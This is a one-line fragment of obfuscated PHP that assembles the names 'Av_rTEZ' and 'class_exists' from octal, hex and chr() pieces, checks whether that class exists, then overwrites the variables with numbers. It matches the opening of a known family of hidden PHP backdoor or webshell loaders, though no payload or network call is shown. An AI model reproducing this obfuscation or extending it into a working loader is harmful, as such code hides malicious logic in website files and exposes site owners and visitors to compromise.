$ClZmOM = "\101" . 'v' . '_' . "\x72" . 'T' . chr (69) . "\x5a";$CyisgOfiXi = chr (99) . "\154" . chr ( 240 - 143 ).'s' . chr (115) . chr (95) . "\145" . "\170" . "\151" . chr (115) . chr (116) . 's';$akfTc = class_exists($ClZmOM); $ClZmOM = "20997";$CyisgOfiXi = "42402";